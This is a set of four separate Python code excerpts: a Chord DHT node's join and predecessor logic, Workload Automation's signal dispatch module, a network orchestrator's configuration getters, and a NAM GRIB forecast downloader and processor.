else: # ret2.err_code == ErrorCode.InternalControlFlowException_CODE || ret2.err_code == ErrorCode.NodeIsDownedException_CODE
handle_err()
#return PResult.Ok(True)
# except (NodeIsDownedExceptiopn, InternalControlFlowException):
# ChordUtil.dprint("partial_join_op_6,NODE_IS_DOWNED or InternalControlFlowException" + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
# + ChordUtil.gen_debug_str_of_node(node_info))
# # If the node was down or similar, ignore it and carry on.
# # Handling node failures and the proper re-placement of the related replicas happen later inside
# # the stabilize and put processing respectively, so they are not dealt with here
# # (note that the replica may be absent from this node for a non-trivial amount of time)
# pass
# Receive every replica held by the successor and store it (since this node now sits in front of
# the successor, it must in principle hold all of the replicas the successor holds)
# (if this races with a node further ahead distributing replicas via join or put, the data could
# be overwritten with older data held by the successor, but such timing is rare and a subsequent
# put delivers the latest data again, so this is judged acceptable)
# try:
# successor : 'ChordNode' = ChordUtil.get_node_by_address(self.existing_node.node_info.successor_info_list[0].address_str)
ret = ChordUtil.get_node_by_address(self.existing_node.node_info.successor_info_list[0].address_str)
if (ret.is_ok):
successor : 'ChordNode' = cast('ChordNode', ret.result)
# TODO: get_all_data call at partial_join_op
passed_all_replica: List[DataIdAndValue] = successor.endpoints.grpc__get_all_data()
self.existing_node.data_store.store_replica_of_multi_masters(passed_all_replica)
else: # ret.err_code == ErrorCode.InternalControlFlowException_CODE || ret.err_code == ErrorCode.NodeIsDownedException_CODE
# If the node was down or similar, ignore it and carry on.
# Handling node failures and the proper re-placement of the related replicas happen later inside
# the stabilize and put processing respectively, so they are not dealt with here
# (note that the replica may be absent from this node for a non-trivial amount of time)
ChordUtil.dprint(
"partial_join_op_7,NODE_IS_DOWNED or InternalControlFlowException" + ChordUtil.gen_debug_str_of_node(
self.existing_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(node_info))
# except (NodeIsDownedExceptiopn, InternalControlFlowException):
# # If the node was down or similar, ignore it and carry on.
# # Handling node failures and the proper re-placement of the related replicas happen later inside
# # the stabilize and put processing respectively, so they are not dealt with here
# # (note that the replica may be absent from this node for a non-trivial amount of time)
# ChordUtil.dprint(
# "partial_join_op_7,NODE_IS_DOWNED or InternalControlFlowException" + ChordUtil.gen_debug_str_of_node(
# self.existing_node.node_info) + ","
# + ChordUtil.gen_debug_str_of_node(node_info))
# All of the join processing has finished
self.existing_node.is_join_op_finished = True
# Release the kill thread that was held back until partial_join_op finished
gval.is_waiting_partial_join_op_exists = False
# Own node info, intermediary node info, and the info of the node set as successor
ChordUtil.dprint("partial_join_op_8," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(self.existing_node.node_info.successor_info_list[0]))
return PResult.Ok(True)
finally:
self.existing_node.node_info.lock_of_succ_infos.release()
self.existing_node.node_info.lock_of_pred_info.release()
# Check whether the given id should be this node's predecessor, and if so, update the routing table.
# This method is used as part of the stabilize processing
# Attention: may raise InternalControlFlowException
# TODO: InternalExp at check_predecessor
def check_predecessor(self, node_info : 'NodeInfo') -> PResult[bool]:
if self.existing_node.node_info.lock_of_pred_info.acquire(timeout=gval.LOCK_ACQUIRE_TIMEOUT) == False:
ChordUtil.dprint("check_predecessor_0," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ "LOCK_ACQUIRE_TIMEOUT")
#raise InternalControlFlowException("gettting lock of predecessor_info is timedout.")
return PResult.Err(False, ErrorCode.InternalControlFlowException_CODE)
ChordUtil.dprint_routing_info(self.existing_node, sys._getframe().f_code.co_name)
try:
if self.existing_node.node_info.predecessor_info == None:
# If no predecessor is set, unconditionally adopt the node we were asked to check
self.existing_node.node_info.predecessor_info = node_info.get_partial_deepcopy()
ChordUtil.dprint("check_predecessor_1," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(self.existing_node.node_info.successor_info_list[0]))
ChordUtil.dprint("check_predecessor_2," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(self.existing_node.node_info.successor_info_list[0]))
# Check whether the predecessor recognized at this point has gone down
# is_pred_alived = ChordUtil.is_node_alive(cast('NodeInfo', self.existing_node.node_info.predecessor_info).address_str)
ret = ChordUtil.is_node_alive(cast('NodeInfo', self.existing_node.node_info.predecessor_info).address_str)
if (ret.is_ok):
is_pred_alived : bool = cast(bool, ret.result)
else: # ret.err_code == ErrorCode.InternalControlFlowException_CODE
is_pred_alived : bool = False
if is_pred_alived:
distance_check = ChordUtil.calc_distance_between_nodes_left_mawari(self.existing_node.node_info.node_id, node_info.node_id)
distance_cur = ChordUtil.calc_distance_between_nodes_left_mawari(self.existing_node.node_info.node_id,
cast('NodeInfo',self.existing_node.node_info.predecessor_info).node_id)
# If the node we were asked to check looks more like the predecessor than the current one,
# update the routing table
if distance_check < distance_cur:
self.existing_node.node_info.predecessor_info = node_info.get_partial_deepcopy()
ChordUtil.dprint("check_predecessor_3," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(self.existing_node.node_info.successor_info_list[0]) + ","
+ ChordUtil.gen_debug_str_of_node(self.existing_node.node_info.predecessor_info))
else: # If the predecessor was down, unconditionally set the node we were asked to check as the predecessor
self.existing_node.node_info.predecessor_info = node_info.get_partial_deepcopy()
return | |
# Copyright 2013-2018 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
This module wraps louie signalling mechanism. It relies on modified version of louie
that has prioritization added to handler invocation.
"""
import sys
import logging
from contextlib import contextmanager
from louie import dispatcher, saferef # pylint: disable=wrong-import-order
from louie.dispatcher import _remove_receiver
import wrapt
from wa.utils.types import prioritylist, enum
logger = logging.getLogger('signal')
class Signal(object):
"""
This class implements the signals to be used for notifying callbacks
registered to respond to different states and stages of the execution of workload
automation.
"""
def __init__(self, name, description='no description', invert_priority=False):
"""
Instantiates a Signal.
:param name: name is the identifier of the Signal object. Signal instances with
the same name refer to the same execution state/stage.
:param invert_priority: boolean parameter that determines whether multiple
callbacks for the same signal should be
ordered with ascending or descending
priorities. Typically this flag should be
set to True if the Signal is triggered
AFTER a state/stage has been reached.
That way callbacks with high priorities
will be called right after the event has
occurred.
"""
self.name = name
self.description = description
self.invert_priority = invert_priority
def __str__(self):
return self.name
__repr__ = __str__
def __hash__(self):
return id(self.name)
# Signals associated with run-related events
RUN_STARTED = Signal('run-started', 'sent at the beginning of the run')
RUN_INITIALIZED = Signal('run-initialized', 'set after the run has been initialized')
RUN_ABORTED = Signal('run-aborted', 'set when the run has been aborted due to a keyboard interrupt')
RUN_FAILED = Signal('run-failed', 'set if the run has failed to complete all jobs.')
RUN_FINALIZED = Signal('run-finalized', 'set after the run has been finalized')
RUN_COMPLETED = Signal('run-completed', 'set upon completion of the run (regardless of whether or not it has failed')
# Signals associated with job-related events
JOB_STARTED = Signal('job-started', 'set when a new job has been started')
JOB_ABORTED = Signal('job-aborted',
description='''
sent if a job has been aborted due to a keyboard interrupt.
.. note:: While the status of every job that has not had a
chance to run due to being interrupted will be
set to "ABORTED", this signal will only be sent
for the job that was actually running at the
time.
''')
JOB_FAILED = Signal('job-failed', description='set if the job has failed')
JOB_RESTARTED = Signal('job-restarted')
JOB_COMPLETED = Signal('job-completed')
# Signals associated with particular stages of workload execution
BEFORE_WORKLOAD_INITIALIZED = Signal('before-workload-initialized',
invert_priority=True)
SUCCESSFUL_WORKLOAD_INITIALIZED = Signal('successful-workload-initialized')
AFTER_WORKLOAD_INITIALIZED = Signal('after-workload-initialized')
BEFORE_WORKLOAD_SETUP = Signal('before-workload-setup', invert_priority=True)
SUCCESSFUL_WORKLOAD_SETUP = Signal('successful-workload-setup')
AFTER_WORKLOAD_SETUP = Signal('after-workload-setup')
BEFORE_WORKLOAD_EXECUTION = Signal('before-workload-execution', invert_priority=True)
SUCCESSFUL_WORKLOAD_EXECUTION = Signal('successful-workload-execution')
AFTER_WORKLOAD_EXECUTION = Signal('after-workload-execution')
BEFORE_WORKLOAD_RESULT_EXTRACTION = Signal('before-workload-result-extracton', invert_priority=True)
SUCCESSFUL_WORKLOAD_RESULT_EXTRACTION = Signal('successful-workload-result-extracton')
AFTER_WORKLOAD_RESULT_EXTRACTION = Signal('after-workload-result-extracton')
BEFORE_WORKLOAD_OUTPUT_UPDATE = Signal('before-workload-output-update',
invert_priority=True)
SUCCESSFUL_WORKLOAD_OUTPUT_UPDATE = Signal('successful-workload-output-update')
AFTER_WORKLOAD_OUTPUT_UPDATE = Signal('after-workload-output-update')
BEFORE_WORKLOAD_TEARDOWN = Signal('before-workload-teardown', invert_priority=True)
SUCCESSFUL_WORKLOAD_TEARDOWN = Signal('successful-workload-teardown')
AFTER_WORKLOAD_TEARDOWN = Signal('after-workload-teardown')
BEFORE_WORKLOAD_FINALIZED = Signal('before-workload-finalized', invert_priority=True)
SUCCESSFUL_WORKLOAD_FINALIZED = Signal('successful-workload-finalized')
AFTER_WORKLOAD_FINALIZED = Signal('after-workload-finalized')
# Signals indicating exceptional conditions
ERROR_LOGGED = Signal('error-logged')
WARNING_LOGGED = Signal('warning-logged')
# These are paired events -- if the before_event is sent, the after_ signal is
# guaranteed to also be sent. In particular, the after_ signals will be sent
# even if there is an error, so you cannot assume in the handler that the
# device has booted successfully. In most cases, you should instead use the
# non-paired signals below.
BEFORE_RUN_INIT = Signal('before-run-init', invert_priority=True)
SUCCESSFUL_RUN_INIT = Signal('successful-run-init')
AFTER_RUN_INIT = Signal('after-run-init')
BEFORE_JOB = Signal('before-job', invert_priority=True)
SUCCESSFUL_JOB = Signal('successful-job')
AFTER_JOB = Signal('after-job')
BEFORE_JOB_QUEUE_EXECUTION = Signal('before-job-queue-execution', invert_priority=True)
SUCCESSFUL_JOB_QUEUE_EXECUTION = Signal('successful-job-queue-execution')
AFTER_JOB_QUEUE_EXECUTION = Signal('after-job-queue-execution')
BEFORE_JOB_TARGET_CONFIG = Signal('before-job-target-config', invert_priority=True)
SUCCESSFUL_JOB_TARGET_CONFIG = Signal('successful-job-target-config')
AFTER_JOB_TARGET_CONFIG = Signal('after-job-target-config')
BEFORE_JOB_OUTPUT_PROCESSED = Signal('before-job-output-processed',
invert_priority=True)
SUCCESSFUL_JOB_OUTPUT_PROCESSED = Signal('successful-job-output-processed')
AFTER_JOB_OUTPUT_PROCESSED = Signal('after-job-output-processed')
BEFORE_FLASHING = Signal('before-flashing', invert_priority=True)
SUCCESSFUL_FLASHING = Signal('successful-flashing')
AFTER_FLASHING = Signal('after-flashing')
BEFORE_REBOOT = Signal('before-reboot', invert_priority=True)
SUCCESSFUL_REBOOT = Signal('successful-reboot')
AFTER_REBOOT = Signal('after-reboot')
BEFORE_TARGET_CONNECT = Signal('before-target-connect', invert_priority=True)
SUCCESSFUL_TARGET_CONNECT = Signal('successful-target-connect')
AFTER_TARGET_CONNECT = Signal('after-target-connect')
BEFORE_TARGET_DISCONNECT = Signal('before-target-disconnect', invert_priority=True)
SUCCESSFUL_TARGET_DISCONNECT = Signal('successful-target-disconnect')
AFTER_TARGET_DISCONNECT = Signal('after-target-disconnect')
BEFORE_RUN_OUTPUT_PROCESSED = Signal(
'before-run-output-processed', invert_priority=True)
SUCCESSFUL_RUN_OUTPUT_PROCESSED = Signal(
'successful-run-output-processed')
AFTER_RUN_OUTPUT_PROCESSED = Signal(
'after-run-output-processed')
CallbackPriority = enum(['extremely_low', 'very_low', 'low', 'normal',
'high', 'very_high', 'extremely_high'], -30, 10)
class _prioritylist_wrapper(prioritylist):
"""
This adds a NOP append() method so that when louie invokes it to add the
handler to receivers, nothing will happen; the handler is actually added inside
the connect() below according to priority, before louie's connect() gets invoked.
"""
def append(self, *args, **kwargs):
pass
def connect(handler, signal, sender=dispatcher.Any, priority=0):
"""
Connects a callback to a signal, so that the callback will be automatically invoked
when that signal is sent.
Parameters:
:handler: This can be any callable that takes the right arguments for
the signal. For most signals this means a single argument that
will be an ``ExecutionContext`` instance. But please see documentation
for individual signals in the :ref:`signals reference <instruments_method_map>`.
:signal: The signal to which the handler will be subscribed. Please see
:ref:`signals reference <instruments_method_map>` for the list of standard WA
signals.
.. note:: There is nothing that prevents instruments from sending their
own signals that are not part of the standard set. However the signal
must always be an :class:`wa.core.signal.Signal` instance.
:sender: The handler will be invoked only for the signals emitted by this sender. By
default, this is set to :class:`louie.dispatcher.Any`, so the handler will
be invoked for signals from any sender.
:priority: An integer (positive or negative) that specifies the priority of the handler.
Handlers with higher priority will be called before handlers with lower
priority. The call order of handlers with the same priority is not specified.
Defaults to 0.
.. note:: Priorities for some signals are inverted (so highest priority
handlers get executed last). Please see :ref:`signals reference <instruments_method_map>`
for details.
"""
logger.debug('Connecting {} to {}({}) with priority {}'.format(handler, signal, sender, priority))
if getattr(signal, 'invert_priority', False):
priority = -priority
senderkey = id(sender)
if senderkey in dispatcher.connections:
signals = dispatcher.connections[senderkey]
else:
dispatcher.connections[senderkey] = signals = {}
if signal in signals:
receivers = signals[signal]
else:
receivers = signals[signal] = _prioritylist_wrapper()
dispatcher.connect(handler, signal, sender)
receivers.add(saferef.safe_ref(handler, on_delete=_remove_receiver), priority)
def disconnect(handler, signal, sender=dispatcher.Any):
"""
Disconnect a previously connected handler from the specified signal, optionally, only
for the specified sender.
Parameters:
:handler: The callback to be disconnected.
:signal: The signal the handler is to be disconnected from. It will
be an :class:`wa.core.signal.Signal` instance.
:sender: If specified, the handler will only be disconnected from the signal
sent by this sender.
"""
logger.debug('Disconnecting {} from {}({})'.format(handler, signal, sender))
dispatcher.disconnect(handler, signal, sender)
def send(signal, sender=dispatcher.Anonymous, *args, **kwargs):
"""
Sends a signal, causing connected handlers to be invoked.
Parameters:
:signal: Signal to be sent. This must be an instance of :class:`wa.core.signal.Signal`
or its subclasses.
:sender: The sender of the signal (typically, this would be ``self``). Some handlers may only
be subscribed to signals from a particular sender.
The rest of the parameters will be passed on as arguments to the handler.
"""
logger.debug('Sending {} from {}'.format(signal, sender))
return dispatcher.send(signal, sender, *args, **kwargs)
# This will normally be set to log_error() by init_logging(); see wa.utils.log
# Done this way to prevent a circular import dependency.
log_error_func = logger.error
def safe_send(signal, sender=dispatcher.Anonymous,
propagate=None, *args, **kwargs):
"""
Same as ``send``, except this will catch and log all exceptions raised
by handlers, except those specified in the ``propagate`` argument (defaults
to just ``[KeyboardInterrupt]``).
"""
if propagate is None:
propagate = [KeyboardInterrupt]
try:
logger.debug('Safe-sending {} from {}'.format(signal, sender))
send(signal, sender, *args, **kwargs)
except Exception as e: # pylint: disable=broad-except
if any(isinstance(e, p) for p in propagate):
raise e
log_error_func(e)
@contextmanager
def wrap(signal_name, sender=dispatcher.Anonymous, *args, **kwargs): # pylint: disable=keyword-arg-before-vararg
"""Wraps the suite in before/after signals, ensuring
that the after signal is always sent."""
safe = kwargs.pop('safe', False)
signal_name = signal_name.upper().replace('-', '_')
send_func = safe_send if safe else send
try:
before_signal = globals()['BEFORE_' + signal_name]
success_signal = globals()['SUCCESSFUL_' + signal_name]
after_signal = globals()['AFTER_' + signal_name]
except KeyError:
raise ValueError('Invalid wrapped signal name: {}'.format(signal_name))
try:
send_func(before_signal, sender, *args, **kwargs)
yield
send_func(success_signal, sender, *args, **kwargs)
finally:
_, exc, _ = sys.exc_info()
if exc:
log_error_func(exc)
send_func(after_signal, sender, *args, **kwargs)
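# Example usage (an illustrative sketch, not part of the original module; the
# handler, `some_runner`, `job_context`, and `do_reboot` names are hypothetical):
#
#     def on_job_started(context):
#         logger.info('job started: %s', context)
#
#     connect(on_job_started, JOB_STARTED, priority=10)
#     send(JOB_STARTED, some_runner, job_context)   # invokes on_job_started
#     disconnect(on_job_started, JOB_STARTED)
#
#     # wrap() brackets a block with the BEFORE_/SUCCESSFUL_/AFTER_ signals:
#     with wrap('REBOOT', sender=some_runner):
#         do_reboot()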
def wrapped(signal_name, sender=dispatcher.Anonymous, safe=False):
"""A decorator for wrapping function in signal dispatch."""
@wrapt.decorator
def signal_wrapped(wrapped_func, _, args, kwargs):
def signal_wrapper(*args, **kwargs):
with wrap(signal_name, sender, safe):
return wrapped_func(*args, **kwargs)
return signal_wrapper(*args, **kwargs)
| |
mapping process is enabled for the ``layer`` or not.
:param layer: layer name
:type layer: str
:return: enabled value (default: False)
:rtype: bool
"""
try:
return self.__config[layer]['PROCESSOR']['enabled']
except KeyError:
return False
def get_threaded (self, layer):
"""
Return with the value indicating whether the mapping strategy needs to run in a
separate thread or not. If the value is not defined, return False.
:param layer: layer name
:type layer: str
:return: threading value
:rtype: bool
"""
try:
return self.__config[layer]['STRATEGY']['THREADED']
except KeyError:
return False
##############################################################################
# REST_API layer getters
##############################################################################
def get_rest_api_resource_class (self, layer):
"""
"""
try:
return getattr(importlib.import_module(
self.__config['REST-API']['resources'][layer]['module']),
self.__config['REST-API']['resources'][layer]['class'], None)
except KeyError:
return None
def get_rest_api_prefix (self):
try:
return self.__config['REST-API']['prefix']
except KeyError:
return None
def get_rest_api_config (self, layer):
try:
cfg = self.__config['REST-API']['resources'][layer].copy()
del cfg['module']
del cfg['class']
return cfg
except KeyError:
return {}
def get_rest_api_host (self):
try:
return self.__config['REST-API'].get('host')
except KeyError:
return None
def get_rest_api_port (self):
try:
return self.__config['REST-API'].get('port')
except KeyError:
return None
def get_rest_api_resource_params (self, layer):
"""
Return the Cf-Or API params for agent request handler.
:return: params
:rtype: dict
"""
try:
return self.__config['REST-API']['resources'][layer]
except KeyError:
return {}
def get_rest_api_user(self):
try:
return self.__config['REST-API'].get('auth_user')
except KeyError:
return None
def get_rest_api_secret(self):
try:
return self.__config['REST-API'].get('auth_secret')
except KeyError:
return None
##############################################################################
# SERVICE layer getters
##############################################################################
def get_sas_request_delay (self):
"""
Return the default delay value for service request parsing from file.
:return: delay
:rtype: int
"""
try:
return int(
self.__config[SERVICE]['SCHEDULED_SERVICE_REQUEST_DELAY'])
except (KeyError, ValueError):
return 0
##############################################################################
# Virtualizer getters
##############################################################################
def get_api_virtualizer (self, layer):
"""
Return the type of the assigned Virtualizer.
:return: type of the Virtualizer as in :any:`VirtualizerManager`
:rtype: str
"""
try:
return self.__config['REST-API']['resources'][layer]['virtualizer_type']
except (KeyError, AttributeError, TypeError):
return None
def get_virtualizer_params (self, layer):
try:
return self.__config['REST-API']['resources'][layer][
'virtualizer_params']
except KeyError:
return {}
##############################################################################
# ADAPTATION layer getters
##############################################################################
def get_vnfm_enabled (self):
"""
Return whether the VNFM component is enabled.
:return: VNFM is enabled or not
:rtype: bool
"""
try:
return self.__config[ADAPT]['VNFM']['enabled']
except KeyError:
return False
def get_vnfm_config (self):
"""
Return the VNFM external component configuration.
:return: VNFM config
:rtype: dict
"""
try:
params = self.__config[ADAPT]['VNFM'].copy()
return params
except KeyError:
return {}
def get_callback_config (self):
"""
Return the common callback configuration for :class:`CallbackManager`.
:return: callback manager config
:rtype: dict
"""
try:
return self.__config[ADAPT]['CALLBACK'].copy()
except KeyError:
return {}
def get_component (self, component, parent=None):
"""
Return with the class of the adaptation component.
:param component: component name
:type component: str
:param parent: define the parent of the actual component's configuration
:type parent: dict
:return: component class
"""
try:
comp = self.__config[ADAPT][component] if parent is None \
else parent[component]
return getattr(importlib.import_module(comp['module']), comp['class'])
except KeyError:
return None
def get_component_params (self, component, parent=None):
"""
Return with the initial parameters of the given component defined in CONFIG.
The param's name must be identical with the attribute name of the component
constructor.
:param component: component name
:type component: str
:param parent: define the parent of the actual component's configuration
:type parent: dict
:return: initial params
:rtype: dict
"""
try:
params = self.__config[ADAPT][component] \
if parent is None else parent[component]
except KeyError:
return {}
try:
# FIXME - what if there are no module and class???
params = params.copy()
del params['module']
del params['class']
except KeyError:
pass
return params
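# Illustrative shape of an adaptation-layer component entry consumed by
# get_component() / get_component_params() above (a hedged sketch inferred from
# this code, not an excerpt of a shipped config; the module/class values are
# example assumptions):
#
#     CONFIG[ADAPT]["SDN"] = {
#         "module": "escape.adapt.managers",   # imported via importlib
#         "class": "SDNDomainManager",         # attribute looked up on the module
#         "domain_name": "SDN",                # remaining keys become constructor kwargs
#         "poll": False,
#     }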
def get_managers (self):
"""
Return the default DomainManagers for initialization on start.
:return: list of :any:`AbstractDomainManager` names
:rtype: list
"""
try:
return self.__config[ADAPT]['MANAGERS']
except KeyError:
return ()
def get_manager_by_domain (self, domain):
"""
Return the manager configuration belongs to the given domain.
:param domain: domain name
:type domain: str
:return: domain manager config
:rtype: dict
"""
if domain in self.__config[ADAPT]:
return self.__config[ADAPT][domain]
for mgr in self.__config[ADAPT].itervalues():
if type(mgr) is not dict:
continue
if mgr.get('domain_name', None) == domain:
return mgr
def get_internal_manager (self):
"""
Return with the Manager class which is detected as the Manager of the
locally emulated Mininet-based network.
Based on the IS_INTERNAL_MANAGER attribute of the defined DomainManager
classes in the global config.
:return: local manager name(s)
:rtype: dict
"""
internal_mgrs = []
for item in self.__config[ADAPT].itervalues():
if isinstance(item, dict) and 'module' in item and 'class' in item:
try:
mgr_class = getattr(importlib.import_module(item['module']),
item['class'])
if mgr_class.IS_INTERNAL_MANAGER:
internal_mgrs.append(
item['domain_name'] if 'domain_name' in item else
mgr_class.DEFAULT_DOMAIN_NAME)
except (KeyError, AttributeError, TypeError):
return None
return internal_mgrs if internal_mgrs else None
def get_external_managers (self):
"""
Return with Manager classes which is detected as external managers.
Based on the IS_EXTERNAL_MANAGER attribute of the defined DomainManager
classes in the global config.
:return: external manager name(s)
:rtype: dict
"""
external_mgrs = []
for item in self.__config[ADAPT].itervalues():
if isinstance(item, dict) and 'module' in item and 'class' in item:
try:
mgr_class = getattr(importlib.import_module(item['module']),
item['class'])
if mgr_class.IS_EXTERNAL_MANAGER:
external_mgrs.append(
item['domain_name'] if 'domain_name' in item else
mgr_class.DEFAULT_DOMAIN_NAME)
except (KeyError, AttributeError, TypeError):
return None
return external_mgrs if external_mgrs else None
def reset_domains_after_shutdown (self):
"""
Return with the shutdown strategy to reset domain or not.
:return: reset domain after shutdown or not (default: False)
:rtype: bool
"""
try:
return self.__config[ADAPT]['deployment'][
'RESET-DOMAINS-AFTER-SHUTDOWN']
except KeyError:
return True
def clear_domains_after_shutdown (self):
"""
Return with the shutdown strategy to clear domain or not.
:return: clear domain after shutdown or not (default: True)
:rtype: bool
"""
try:
return self.__config[ADAPT]['deployment'][
'CLEAR-DOMAINS-AFTER-SHUTDOWN']
except KeyError:
return True
def reset_domains_before_install (self):
"""
Return with the pre-deploy strategy to reset domain or not.
:return: reset domain before install or not (default: False)
:rtype: bool
"""
try:
return self.__config[ADAPT]['deployment'][
'RESET-DOMAINS-BEFORE-INSTALL']
except KeyError:
return False
def rollback_on_failure (self):
"""
:return: Return whether rollback mode is enabled.
:rtype: bool
"""
try:
return self.__config[ADAPT]['deployment']['ROLLBACK-ON-FAILURE']
except KeyError:
return False
def domain_deploy_delay (self):
"""
:return: Return explicit delay value injected before deployment.
:rtype: int
"""
try:
return self.__config[ADAPT]['deployment']['DOMAIN-DEPLOY-DELAY']
except KeyError:
return 0
def flowrule_stitching (self):
try:
return self.__config[ADAPT]['deployment'][
'ENABLE-FLOWRULE-STITCHING']
except KeyError:
return True
def use_remerge_update_strategy (self):
"""
Return True if the re-merge update strategy is enabled in DoV updating
instead of using the straightforward step-by-step updating.
:return: re-merge strategy is enabled or not (default: True)
:rtype: bool
"""
try:
return self.__config[ADAPT]['DOV']['USE-REMERGE-UPDATE-STRATEGY']
except KeyError:
return True
def use_status_based_update (self):
"""
Return True if the status based update strategy is enabled.
This approach update DoV as a first step and use element status to update
the domain.
:return: status update strategy is enabled or not (default: False)
:rtype: bool
"""
try:
return self.__config[ADAPT]['DOV']['USE-STATUS-BASED-UPDATE']
except KeyError:
return False
def ensure_unique_bisbis_id (self):
"""
Return with the ID generation strategy for nodes.
If it is set, the id of nodes will be generated with the domain name as a
postfix to ensure a globally unique id.
:return: id generation strategy (default: False)
:rtype: bool
"""
try:
return self.__config[ADAPT]['DOV']['ENSURE-UNIQUE-BiSBiS-ID']
except KeyError:
return False
def ensure_unique_vnf_id (self):
"""
Return with the ID generation strategy for VNFs.
If it is set, the id of VNFs will be generated with the container BiSBiS node
id as a postfix to ensure a globally unique id.
:return: id generation strategy (default: False)
:rtype: bool
"""
try:
return self.__config[ADAPT]['DOV']['ENSURE-UNIQUE-VNF-ID']
except KeyError:
return False
def one_step_update (self):
"""
:return: Return whether one-step update is enabled.
:rtype: bool
"""
try:
return self.__config[ADAPT]['DOV']['ONE-STEP-UPDATE']
except KeyError:
return True
def no_poll_during_deployment (self):
"""
:return: Return whether polling is disabled during service deployment
:rtype: bool
"""
try:
return self.__config[ADAPT]['DOV']['NO-POLL-DURING-DEPLOYMENT']
except KeyError:
return True
def get_sdn_topology (self):
"""
Return the path of the SDN topology config file.
:return: path of topology config file
:rtype: str
"""
try:
# Project root dir relative to this module which is/must be under root
# util/escape/ext/pox/root
return os.path.abspath(
os.path.join(self.get_project_root_dir(),
self.__config[ADAPT]['SDN']['TOPOLOGY']['path']))
except KeyError:
return None
##############################################################################
# INFRASTRUCTURE layer getters
##############################################################################
def get_mn_network_opts (self):
"""
Return the optional Mininet parameters for initiation.
:return: optional constructor params (default: empty dict)
:rtype: dict
"""
try:
mn_opts = self.__config[INFR]['NETWORK-OPTS']
return mn_opts if mn_opts is not None else {}
except KeyError:
return {}
def get_mininet_topology (self):
"""
Return the path of the Mininet topology script.
:return: topology path
"""
try:
# Project root dir relative to this module which is/must be under pox/ext
return os.path.abspath(os.path.join(self.get_project_root_dir(),
self.__config[INFR]['TOPO']))
except KeyError:
return None
def get_fallback_topology (self):
| |
includes both system and HTTP errors.
# Retry with exponential backoff.
logger.warning(err)
path.unlink()
if i + 1 == max_tries:
logger.error(f'download of {path.name} failed, giving up')
raise err
else:
delay = 2**i
logger.warning(f'download of {path.name} failed, retrying in {delay}s')
sleep(delay)
continue
except (Exception, SystemExit, KeyboardInterrupt) as err:
# Partial files should be deleted
# SystemExit and KeyboardInterrupt must be caught explicitly.
path.unlink()
raise err
logger.info(f'reading {path}')
return xr.open_dataset(path, engine='pynio')
def _process_grib(ds, reftime, forecast):
'''Process a forecast loaded from GRIB.
GRIB files contain a forecast for a specific forecast hour at a specific
reftime, including all NAM data variables for the entire NAM 218 grid.
This method trims the dataset to the subset of variables and geographic
region that we are interested in, normalizes variable names and shapes
to a more consistent format, and adds additional metadata.
Arguments:
ds (xarray.Dataset):
The dataset to process.
reftime (timestamp):
The reference time associated with the dataset.
forecast (int):
The forecast hour associated with the dataset.
Returns:
xarray.Dataset:
A processed dataset.
'''
features = {
# Data variables
'DLWRF_P0_L1_GLC0': 'DLWRF_SFC', 'DSWRF_P0_L1_GLC0': 'DSWRF_SFC',
'PRES_P0_L1_GLC0': 'PRES_SFC',
'PRES_P0_L6_GLC0': 'PRES_MWSL', 'PRES_P0_L7_GLC0': 'PRES_TRO',
'TCDC_P0_L200_GLC0': 'TCC_EATM', 'TMP_P0_2L108_GLC0': 'TMP_SPDY',
'TMP_P0_L1_GLC0': 'TMP_SFC', 'TMP_P0_L100_GLC0': 'TMP_ISBL',
'TMP_P0_L103_GLC0': 'TMP_HTGL', 'TMP_P0_L7_GLC0': 'TMP_TRO',
'RH_P0_2L104_GLC0': 'RH_SIGY', 'RH_P0_2L108_GLC0': 'RH_SPDY',
'RH_P0_L100_GLC0': 'RH_ISBL',
'RH_P0_L4_GLC0': 'RH_0DEG', 'UGRD_P0_2L108_GLC0': 'UGRD_SPDY',
'UGRD_P0_L100_GLC0': 'UGRD_ISBL', 'UGRD_P0_L103_GLC0': 'UGRD_HTGL',
'UGRD_P0_L220_GLC0': 'UGRD_TOA', 'UGRD_P0_L6_GLC0': 'UGRD_MWSL',
'UGRD_P0_L7_GLC0': 'UGRD_TRO', 'VGRD_P0_2L108_GLC0': 'VGRD_SPDY',
'VGRD_P0_L100_GLC0': 'VGRD_ISBL', 'VGRD_P0_L103_GLC0': 'VGRD_HTGL',
'VGRD_P0_L220_GLC0': 'VGRD_TOA', 'VGRD_P0_L6_GLC0': 'VGRD_MWSL',
'VGRD_P0_L7_GLC0': 'VGRD_TRO', 'VIS_P0_L1_GLC0': 'VIS_SFC',
'LHTFL_P0_L1_GLC0': 'LHTFL_SFC', 'SHTFL_P0_L1_GLC0': 'SHTFL_SFC',
'REFC_P0_L200_GLC0': 'REFC_EATM', 'REFD_P0_L103_GLC0': 'REFD_HTGL',
'REFD_P0_L105_GLC0': 'REFD_HYBL', 'VVEL_P0_L100_GLC0': 'VVEL_ISBL',
'HGT_P0_L1_GLC0': 'HGT_SFC', 'HGT_P0_L100_GLC0': 'HGT_ISBL',
'HGT_P0_L2_GLC0': 'HGT_CBL', 'HGT_P0_L220_GLC0': 'HGT_TOA',
'HGT_P0_L245_GLC0': 'HGT_LLTW', 'HGT_P0_L4_GLC0': 'HGT_0DEG',
'PWAT_P0_L200_GLC0': 'PWAT_EATM', 'TKE_P0_L100_GLC0': 'TKE_ISBL',
# Coordinate variables
'lv_HTGL1': 'z_HTGL1', 'lv_HTGL3': 'z_HTGL2',
'lv_HTGL6': 'z_HTGL3', 'lv_ISBL0': 'z_ISBL',
'lv_SPDL2': 'z_SPDY',
'xgrid_0': 'x', 'ygrid_0': 'y',
'gridlat_0': 'lat', 'gridlon_0': 'lon',
}
unwanted = [k for k in ds.variables.keys() if k not in features]
